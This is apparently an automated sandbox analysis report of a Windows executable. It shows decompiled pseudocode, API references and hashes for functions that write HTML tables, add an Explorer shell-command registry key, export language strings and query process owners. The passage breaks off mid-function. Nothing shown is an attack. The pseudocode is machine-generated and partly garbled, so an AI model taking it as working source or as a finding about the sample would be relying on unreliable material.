                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Item$MessageSend$HandleModuleWindow$Load$Imagememset$AcceptAddressClientDragFilesFocusFreeLibraryLongProcRectStringText_snwprintfmemcpywcscpywcslen
                                                                                      • String ID:
                                                                                      • API String ID: 1038210931-0
                                                                                      • Opcode ID: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                      • Instruction ID: 1ad7597cb923a57af30b7376ae6fce15a7391ca9e5b6ac25faa2013acf12c195
                                                                                      • Opcode Fuzzy Hash: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                      • Instruction Fuzzy Hash: D261A6B09407087FE6207F71DC47F2B7A6CEF40714F000A3ABB46751D3DABA69158A59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 56%
                                                                                      			E00407763(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                      				signed int _v8;
                                                                                      				signed int _v12;
                                                                                      				intOrPtr _v16;
                                                                                      				intOrPtr _v20;
                                                                                      				signed int _v24;
                                                                                      				signed int _v28;
                                                                                      				signed int _v32;
                                                                                      				void _v138;
                                                                                      				long _v140;
                                                                                      				void _v242;
                                                                                      				char _v244;
                                                                                      				void _v346;
                                                                                      				char _v348;
                                                                                      				void _v452;
                                                                                      				void _v962;
                                                                                      				signed short _v964;
                                                                                      				void* __esi;
                                                                                      				void* _t87;
                                                                                      				wchar_t* _t109;
                                                                                      				intOrPtr* _t124;
                                                                                      				signed int _t125;
                                                                                      				signed int _t140;
                                                                                      				signed int _t153;
                                                                                      				intOrPtr* _t154;
                                                                                      				signed int _t156;
                                                                                      				signed int _t157;
                                                                                      				void* _t159;
                                                                                      				void* _t161;
                                                                                      
                                                                                      				_t124 = __ebx;
                                                                                      				_v964 = _v964 & 0x00000000;
                                                                                      				memset( &_v962, 0, 0x1fc);
                                                                                      				_t125 = 0x18;
                                                                                      				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
                                                                                      				asm("movsw");
                                                                                      				_t153 = 0;
                                                                                      				_v244 = 0;
                                                                                      				memset( &_v242, 0, 0x62);
                                                                                      				_v348 = 0;
                                                                                      				memset( &_v346, 0, 0x62);
                                                                                      				_v140 = 0;
                                                                                      				memset( &_v138, 0, 0x62);
                                                                                      				_t161 = _t159 + 0x3c;
                                                                                      				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
                                                                                      				_v16 =  *((intOrPtr*)(__ebx + 0x2d4));
                                                                                      				if(_t87 != 0xffffffff) {
                                                                                      					_push(E0040ADC0(_t87,  &_v964));
                                                                                      					_push(L" bgcolor=\"%s\"");
                                                                                      					_push(0x32);
                                                                                      					_push( &_v244);
                                                                                      					L0040B1EC();
                                                                                      					_t161 = _t161 + 0x18;
                                                                                      				}
                                                                                      				E00407343(_t124, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
                                                                                      				_v8 = _t153;
                                                                                      				if( *((intOrPtr*)(_t124 + 0x2c)) > _t153) {
                                                                                      					while(1) {
                                                                                      						_t156 =  *( *((intOrPtr*)(_t124 + 0x30)) + _v8 * 4);
                                                                                      						_v12 = _t156;
                                                                                      						_t157 = _t156 * 0x14;
                                                                                      						if( *((intOrPtr*)(_t157 +  *((intOrPtr*)(_t124 + 0x40)) + 8)) != _t153) {
                                                                                      							wcscpy( &_v140, L" nowrap");
                                                                                      						}
                                                                                      						_v32 = _v32 | 0xffffffff;
                                                                                      						_v28 = _v28 | 0xffffffff;
                                                                                      						_v24 = _v24 | 0xffffffff;
                                                                                      						_v20 = _t153;
                                                                                      						_t154 = _a8;
                                                                                      						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t154,  &_v32);
                                                                                      						E0040ADC0(_v32,  &_v348);
                                                                                      						E0040ADF1( *((intOrPtr*)( *_t154))(_v12,  *((intOrPtr*)(_t124 + 0x60))),  *(_t124 + 0x64));
                                                                                      						 *((intOrPtr*)( *_t124 + 0x50))( *(_t124 + 0x64), _t154, _v12);
                                                                                      						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
                                                                                      							wcscpy( *(_t124 + 0x68),  *(_t157 + _v16 + 0x10));
                                                                                      						} else {
                                                                                      							_push( *(_t157 + _v16 + 0x10));
                                                                                      							_push(E0040ADC0(_t106,  &_v964));
                                                                                      							_push(L"<font color=\"%s\">%s</font>");
                                                                                      							_push(0x2000);
                                                                                      							_push( *(_t124 + 0x68));
                                                                                      							L0040B1EC();
                                                                                      							_t161 = _t161 + 0x14;
                                                                                      						}
                                                                                      						_t109 =  *(_t124 + 0x64);
                                                                                      						_t140 =  *_t109 & 0x0000ffff;
                                                                                      						if(_t140 == 0 || _t140 == 0x20) {
                                                                                      							wcscat(_t109, L"&nbsp;");
                                                                                      						}
                                                                                      						E0040AE90( &_v32,  *((intOrPtr*)(_t124 + 0x6c)),  *(_t124 + 0x64));
                                                                                      						_push( *((intOrPtr*)(_t124 + 0x6c)));
                                                                                      						_push( &_v140);
                                                                                      						_push( &_v348);
                                                                                      						_push( *(_t124 + 0x68));
                                                                                      						_push( &_v244);
                                                                                      						_push( &_v452);
                                                                                      						_push(0x2000);
                                                                                      						_push( *((intOrPtr*)(_t124 + 0x60)));
                                                                                      						L0040B1EC();
                                                                                      						_t161 = _t161 + 0x28;
                                                                                      						E00407343(_t124, _a4,  *((intOrPtr*)(_t124 + 0x60)));
                                                                                      						_v8 = _v8 + 1;
                                                                                      						if(_v8 >=  *((intOrPtr*)(_t124 + 0x2c))) {
                                                                                      							goto L14;
                                                                                      						}
                                                                                      						_t153 = 0;
                                                                                      					}
                                                                                      				}
                                                                                      				L14:
                                                                                      				E00407343(_t124, _a4, L"</table><p>");
                                                                                      				return E00407343(_t124, _a4, L"\r\n");
                                                                                      			}

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                      • API String ID: 1607361635-601624466
                                                                                      • Opcode ID: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                      • Instruction ID: c59e53cc54c64df10e6b193e6b6ea7c08fa255db16bc08a9aa92b01e8cbfba7b
                                                                                      • Opcode Fuzzy Hash: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                      • Instruction Fuzzy Hash: C8618E31940208EFDF14AF95CC85EAE7B79FF44310F1041AAF905BA2D2DB34AA54DB99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 40%
                                                                                      			E00407B5D(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
                                                                                      				void _v514;
                                                                                      				char _v516;
                                                                                      				void _v1026;
                                                                                      				long _v1028;
                                                                                      				void _v1538;
                                                                                      				char _v1540;
                                                                                      				void _v2050;
                                                                                      				char _v2052;
                                                                                      				char _v2564;
                                                                                      				char _v35332;
                                                                                      				char _t51;
                                                                                      				intOrPtr* _t54;
                                                                                      				void* _t61;
                                                                                      				intOrPtr* _t73;
                                                                                      				void* _t78;
                                                                                      				void* _t79;
                                                                                      				void* _t80;
                                                                                      				void* _t81;
                                                                                      
                                                                                      				E0040B550(0x8a00, __ecx);
                                                                                      				_v2052 = 0;
                                                                                      				memset( &_v2050, 0, 0x1fc);
                                                                                      				_v1540 = 0;
                                                                                      				memset( &_v1538, 0, 0x1fc);
                                                                                      				_v1028 = 0;
                                                                                      				memset( &_v1026, 0, 0x1fc);
                                                                                      				_t79 = _t78 + 0x24;
                                                                                      				if(_a20 != 0xffffffff) {
                                                                                      					_push(E0040ADC0(_a20,  &_v2564));
                                                                                      					_push(L" bgcolor=\"%s\"");
                                                                                      					_push(0xff);
                                                                                      					_push( &_v2052);
                                                                                      					L0040B1EC();
                                                                                      					_t79 = _t79 + 0x18;
                                                                                      				}
                                                                                      				if(_a24 != 0xffffffff) {
                                                                                      					_push(E0040ADC0(_a24,  &_v2564));
                                                                                      					_push(L"<font color=\"%s\">");
                                                                                      					_push(0xff);
                                                                                      					_push( &_v1540);
                                                                                      					L0040B1EC();
                                                                                      					wcscpy( &_v1028, L"</font>");
                                                                                      					_t79 = _t79 + 0x20;
                                                                                      				}
                                                                                      				_push( &_v2052);
                                                                                      				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
                                                                                      				_push(0x3fff);
                                                                                      				_push( &_v35332);
                                                                                      				L0040B1EC();
                                                                                      				_t80 = _t79 + 0x10;
                                                                                      				E00407343(_a4, _a8,  &_v35332);
                                                                                      				_t51 = _a16;
                                                                                      				if(_t51 > 0) {
                                                                                      					_t73 = _a12 + 4;
                                                                                      					_a20 = _t51;
                                                                                      					do {
                                                                                      						_v516 = 0;
                                                                                      						memset( &_v514, 0, 0x1fc);
                                                                                      						_t54 =  *_t73;
                                                                                      						_t81 = _t80 + 0xc;
                                                                                      						if( *_t54 == 0) {
                                                                                      							_v516 = 0;
                                                                                      						} else {
                                                                                      							_push(_t54);
                                                                                      							_push(L" width=\"%s\"");
                                                                                      							_push(0xff);
                                                                                      							_push( &_v516);
                                                                                      							L0040B1EC();
                                                                                      							_t81 = _t81 + 0x10;
                                                                                      						}
                                                                                      						_push( &_v1028);
                                                                                      						_push( *((intOrPtr*)(_t73 - 4)));
                                                                                      						_push( &_v1540);
                                                                                      						_push( &_v516);
                                                                                      						_push(L"<th%s>%s%s%s\r\n");
                                                                                      						_push(0x3fff);
                                                                                      						_push( &_v35332);
                                                                                      						L0040B1EC();
                                                                                      						_t80 = _t81 + 0x1c;
                                                                                      						_t61 = E00407343(_a4, _a8,  &_v35332);
                                                                                      						_t73 = _t73 + 8;
                                                                                      						_t36 =  &_a20;
                                                                                      						 *_t36 = _a20 - 1;
                                                                                      					} while ( *_t36 != 0);
                                                                                      					return _t61;
                                                                                      				}
                                                                                      				return _t51;
                                                                                      			}






















                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: _snwprintf$memset$wcscpy
                                                                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                      • API String ID: 2000436516-3842416460
                                                                                      • Opcode ID: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                      • Instruction ID: 17ce3237ebe69143205905a5a122d9f10e08837d2ebaecd13bb40ff2a02a5a8b
                                                                                      • Opcode Fuzzy Hash: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                      • Instruction Fuzzy Hash: EA413371D40219AAEB20EB55CC86FAB737CFF45304F0440BAB918B6191D774AB948FA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 51%
                                                                                      			E00404415(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                                      				void* _v8;
                                                                                      				void* _v12;
                                                                                      				void* _v24;
                                                                                      				intOrPtr _v28;
                                                                                      				short _v32;
                                                                                      				void _v2078;
                                                                                      				signed int _v2080;
                                                                                      				void _v4126;
                                                                                      				char _v4128;
                                                                                      				void _v6174;
                                                                                      				char _v6176;
                                                                                      				void _v8222;
                                                                                      				char _v8224;
                                                                                      				signed int _t49;
                                                                                      				short _t55;
                                                                                      				intOrPtr _t56;
                                                                                      				int _t73;
                                                                                      				intOrPtr _t78;
                                                                                      
                                                                                      				_t76 = __ecx;
                                                                                      				E0040B550(0x201c, __ecx);
                                                                                      				_t73 = 0;
                                                                                      				if(E004043F8( &_v8, 0x2001f) != 0) {
                                                                                      					L6:
                                                                                      					return _t73;
                                                                                      				}
                                                                                      				_v6176 = 0;
                                                                                      				memset( &_v6174, 0, 0x7fe);
                                                                                      				_t78 = _a4;
                                                                                      				_push(_t78 + 0x20a);
                                                                                      				_push(_t78);
                                                                                      				_push(L"%s\\shell\\%s\\command");
                                                                                      				_push(0x3ff);
                                                                                      				_push( &_v6176);
                                                                                      				L0040B1EC();
                                                                                      				if(E00409ECC(_t76, _v8,  &_v6176,  &_v12) == 0) {
                                                                                      					_t49 = E00409EF4(_v12, 0x40c4e8, _t78 + 0x414);
                                                                                      					asm("sbb ebx, ebx");
                                                                                      					_t73 =  ~_t49 + 1;
                                                                                      					RegCloseKey(_v12);
                                                                                      					_v2080 = _v2080 & 0x00000000;
                                                                                      					memset( &_v2078, 0, 0x7fe);
                                                                                      					E00404AD9( &_v2080);
                                                                                      					if(_v2078 == 0x3a) {
                                                                                      						_t55 =  *L"C:\\"; // 0x3a0043
                                                                                      						_v32 = _t55;
                                                                                      						_t56 =  *0x40ccdc; // 0x5c
                                                                                      						_v28 = _t56;
                                                                                      						asm("stosd");
                                                                                      						asm("stosd");
                                                                                      						asm("stosd");
                                                                                      						_v32 = _v2080;
                                                                                      						if(GetDriveTypeW( &_v32) == 3) {
                                                                                      							_v4128 = 0;
                                                                                      							memset( &_v4126, 0, 0x7fe);
                                                                                      							_v8224 = 0;
                                                                                      							memset( &_v8222, 0, 0x7fe);
                                                                                      							_push(_a4 + 0x20a);
                                                                                      							_push(_a4);
                                                                                      							_push(L"%s\\shell\\%s");
                                                                                      							_push(0x3ff);
                                                                                      							_push( &_v8224);
                                                                                      							L0040B1EC();
                                                                                      							_push( &_v2080);
                                                                                      							_push(L"\"%s\",0");
                                                                                      							_push(0x3ff);
                                                                                      							_push( &_v4128);
                                                                                      							L0040B1EC();
                                                                                      							E00409F1A(_t76, _v8,  &_v8224,  &_v4128);
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      				RegCloseKey(_v8);
                                                                                      				goto L6;
                                                                                      			}


                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00404452
                                                                                      • _snwprintf.MSVCRT ref: 00404473
                                                                                        • Part of subcall function 00409ECC: RegCreateKeyExW.ADVAPI32(?,?,00000000,0040C4E8,00000000,000F003F,00000000,?,?,?,?,0040448B,?,?,?,?), ref: 00409EEC
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,0002001F,?,?,0040390E,?), ref: 004045AB
                                                                                        • Part of subcall function 00409EF4: wcslen.MSVCRT ref: 00409EF8
                                                                                        • Part of subcall function 00409EF4: RegSetValueExW.ADVAPI32(004044AA,004044AA,00000000,00000001,004044AA,?,004044AA,?,0040C4E8,?,?,?,?,0002001F), ref: 00409F13
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,0002001F,?,?,0040390E,?), ref: 004044B7
                                                                                      • memset.MSVCRT ref: 004044CF
                                                                                        • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                      • GetDriveTypeW.KERNEL32(?), ref: 00404518
                                                                                      • memset.MSVCRT ref: 00404539
                                                                                      • memset.MSVCRT ref: 0040454E
                                                                                      • _snwprintf.MSVCRT ref: 00404571
                                                                                      • _snwprintf.MSVCRT ref: 0040458A
                                                                                        • Part of subcall function 00409F1A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409F57
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: memset$Close_snwprintf$CreateDriveFileModuleNameTypeValuewcslen
                                                                                      • String ID: "%s",0$%s\shell\%s$%s\shell\%s\command$:$C:\
                                                                                      • API String ID: 486436031-734527199
                                                                                      • Opcode ID: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                      • Instruction ID: 27235bf79c6ca8476a2d09a82ed3c32274241934b1c07e7e02f5f4f3263a5ff1
                                                                                      • Opcode Fuzzy Hash: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                      • Instruction Fuzzy Hash: A4410EB294021CFADB20DB95CC85DDFB6BCEF44304F0084B6B608F2191E7789B559BA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 87%
                                                                                      			E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {
                                                                                      				void _v530;
                                                                                      				char _v532;
                                                                                      				void _v1042;
                                                                                      				long _v1044;
                                                                                      				long _v4116;
                                                                                      				char _v5164;
                                                                                      				void* __edi;
                                                                                      				void* _t27;
                                                                                      				void* _t38;
                                                                                      				void* _t44;
                                                                                      
                                                                                      				E0040B550(0x142c, __ecx);
                                                                                      				_v1044 = 0;
                                                                                      				memset( &_v1042, 0, 0x1fc);
                                                                                      				_v532 = 0;
                                                                                      				memset( &_v530, 0, 0x208);
                                                                                      				E00404AD9( &_v532);
                                                                                      				_pop(_t44);
                                                                                      				E00405AA7( &_v5164);
                                                                                      				_t27 = E0040B04D( &_v5164,  &_v532);
                                                                                      				_t61 = _t27;
                                                                                      				if(_t27 != 0) {
                                                                                      					wcscpy( &_v1044,  &_v4116);
                                                                                      					_pop(_t44);
                                                                                      				}
                                                                                      				wcscpy(0x40fb90, _a8);
                                                                                      				wcscpy(0x40fda0, L"general");
                                                                                      				E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);
                                                                                      				E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
                                                                                      				E00405FAC(_t61, L"Version",  &_v1044, 1);
                                                                                      				E00405FAC(_t61, L"RTL", "0", 0);
                                                                                      				EnumResourceNamesW(_a4, 4, E0040620E, 0);
                                                                                      				EnumResourceNamesW(_a4, 5, E0040620E, 0);
                                                                                      				wcscpy(0x40fda0, L"strings");
                                                                                      				_t38 = E00406337(_t44, _t61, _a4);
                                                                                      				 *0x40fb90 =  *0x40fb90 & 0x00000000;
                                                                                      				return _t38;
                                                                                      			}


                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00406484
                                                                                      • memset.MSVCRT ref: 004064A0
                                                                                        • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                        • Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                        • Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                        • Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                        • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                        • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                        • Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
                                                                                        • Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128
                                                                                      • wcscpy.MSVCRT ref: 004064E4
                                                                                      • wcscpy.MSVCRT ref: 004064F3
                                                                                      • wcscpy.MSVCRT ref: 00406503
                                                                                      • EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
                                                                                      • EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
                                                                                      • wcscpy.MSVCRT ref: 0040657A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                      • String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
                                                                                      • API String ID: 3037099051-2314623505
                                                                                      • Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                      • Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
                                                                                      • Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                      • Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 44%
                                                                                      			E00409A94(long _a4, intOrPtr _a8) {
                                                                                      				int _v8;
                                                                                      				int _v12;
                                                                                      				int _v16;
                                                                                      				void* _v20;
                                                                                      				void* _v24;
                                                                                      				char _v28;
                                                                                      				intOrPtr _v32;
                                                                                      				char _v36;
                                                                                      				char _v44;
                                                                                      				char _v52;
                                                                                      				char _v60;
                                                                                      				void _v315;
                                                                                      				char _v316;
                                                                                      				void _v826;
                                                                                      				char _v828;
                                                                                      				void _v1338;
                                                                                      				char _v1340;
                                                                                      				void* __esi;
                                                                                      				void* _t61;
                                                                                      				_Unknown_base(*)()* _t93;
                                                                                      				void* _t94;
                                                                                      				int _t106;
                                                                                      				void* _t108;
                                                                                      				void* _t110;
                                                                                      
                                                                                      				_v828 = 0;
                                                                                      				memset( &_v826, 0, 0x1fe);
                                                                                      				_v1340 = 0;
                                                                                      				memset( &_v1338, 0, 0x1fe);
                                                                                      				_t110 = _t108 + 0x18;
                                                                                      				_t61 = OpenProcess(0x400, 0, _a4);
                                                                                      				_t113 = _t61;
                                                                                      				_v20 = _t61;
                                                                                      				if(_t61 == 0) {
                                                                                      					L11:
                                                                                      					if(_v828 == 0) {
                                                                                      						__eflags = 0;
                                                                                      						return 0;
                                                                                      					}
                                                                                      					_push( &_v828);
                                                                                      					_push( &_v1340);
                                                                                      					_push(L"%s\\%s");
                                                                                      					_push(0xff);
                                                                                      					_push(_a8);
                                                                                      					L0040B1EC();
                                                                                      					return 1;
                                                                                      				}
                                                                                      				_v8 = 0;
                                                                                      				_v24 = 0;
                                                                                      				E00408F92( &_v8, _t113, _t61, 8,  &_v24);
                                                                                      				_t106 = _v24;
                                                                                      				if(_t106 == 0) {
                                                                                      					_t32 =  &_v20; // 0x4059ec
                                                                                      					E00409555( *_t32,  &_v36,  &_v44,  &_v52,  &_v60);
                                                                                      					_v316 = 0;
                                                                                      					memset( &_v315, 0, 0xfe);
                                                                                      					_t110 = _t110 + 0x20;
                                                                                      					_v16 = 0xff;
                                                                                      					__eflags = E00409A46(0x41c4b4, _a4,  &_v316,  &_v16, _v36, _v32);
                                                                                      					if(__eflags == 0) {
                                                                                      						L9:
                                                                                      						CloseHandle(_v20);
                                                                                      						if(_v8 != 0) {
                                                                                      							FreeLibrary(_v8);
                                                                                      						}
                                                                                      						goto L11;
                                                                                      					}
                                                                                      					_push( &_v28);
                                                                                      					_push( &_a4);
                                                                                      					_push( &_v1340);
                                                                                      					_push( &_v12);
                                                                                      					_push( &_v828);
                                                                                      					_a4 = 0xff;
                                                                                      					_push( &_v316);
                                                                                      					L8:
                                                                                      					_v12 = 0xff;
                                                                                      					E0040906D( &_v8, _t117);
                                                                                      					goto L9;
                                                                                      				}
                                                                                      				_v316 = 0;
                                                                                      				memset( &_v315, 0, 0xff);
                                                                                      				_v12 = _t106;
                                                                                      				_t110 = _t110 + 0xc;
                                                                                      				_a4 = 0;
                                                                                      				if(E00408F72( &_v8) == 0) {
                                                                                      					goto L9;
                                                                                      				}
                                                                                      				_t93 = GetProcAddress(_v8, "GetTokenInformation");
                                                                                      				if(_t93 == 0) {
                                                                                      					goto L9;
                                                                                      				}
                                                                                      				_t94 =  *_t93(_v12, 1,  &_v316, 0xff,  &_a4);
                                                                                      				_t117 = _t94;
                                                                                      				if(_t94 == 0) {
                                                                                      					goto L9;
                                                                                      				}
                                                                                      				_push( &_v28);
                                                                                      				_push( &_v12);
                                                                                      				_push( &_v1340);
                                                                                      				_push( &_v16);
                                                                                      				_push( &_v828);
                                                                                      				_push(_v316);
                                                                                      				_v16 = 0xff;
                                                                                      				goto L8;
                                                                                      			}




























                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00409AB7
                                                                                      • memset.MSVCRT ref: 00409ACF
                                                                                      • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                      • _snwprintf.MSVCRT ref: 00409C5A
                                                                                        • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                      • memset.MSVCRT ref: 00409B25
                                                                                      • GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                      • memset.MSVCRT ref: 00409BC7
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                      • FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: memset$AddressProc$CloseFreeHandleLibraryOpenProcess_snwprintf
                                                                                      • String ID: %s\%s$GetTokenInformation$Y@
                                                                                      • API String ID: 3504373036-27875219
                                                                                      • Opcode ID: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                      • Instruction ID: eda2fbc970d96949daa6443d9737cdff9b2c135ab99c7c98679ff10ae30762ca
                                                                                      • Opcode Fuzzy Hash: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                      • Instruction Fuzzy Hash: E451C9B2C0021DBADB51EB95DC81DEFBBBDEB44344F1045BAB505B2191EA349F84CBA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00409172() {
                                                                                      				void* _t1;
                                                                                      				int _t2;
                                                                                      				struct HINSTANCE__* _t5;
                                                                                      
                                                                                      				if( *0x4101bc != 0) {
                                                                                      					return _t1;
                                                                                      				}
                                                                                      				_t2 = E00405436(L"psapi.dll");
                                                                                      				_t5 = _t2;
                                                                                      				if(_t5 == 0) {
                                                                                      					L10:
                                                                                      					return _t2;
                                                                                      				} else {
                                                                                      					_t2 = GetProcAddress(_t5, "GetModuleBaseNameW");
                                                                                      					 *0x40f848 = _t2;
                                                                                      					if(_t2 != 0) {
                                                                                      						_t2 = GetProcAddress(_t5, "EnumProcessModules");
                                                                                      						 *0x40f840 = _t2;
                                                                                      						if(_t2 != 0) {
                                                                                      							_t2 = GetProcAddress(_t5, "GetModuleFileNameExW");
